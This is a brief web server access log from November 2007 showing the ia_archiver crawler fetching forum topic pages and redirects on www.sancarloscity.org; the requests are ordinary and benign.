64.208.172.181 - - [01/Nov/2007:06:34:40 -0700] "GET /forum2/index.php?showtopic=154&pid=873&st=0&#entry873 HTTP/1.0" 200 20856 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:45 -0700] "GET /forum2/index.php?showtopic=154&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:46 -0700] "GET /forum2/index.php?showtopic=154&st=0&#entry873 HTTP/1.0" 200 20720 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:50 -0700] "GET /forum2/index.php?showtopic=155&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:50 -0700] "GET /forum2/index.php?showtopic=155&pid=874&st=0&#entry874 HTTP/1.0" 200 20471 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:55 -0700] "GET /forum2/index.php?showtopic=155&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
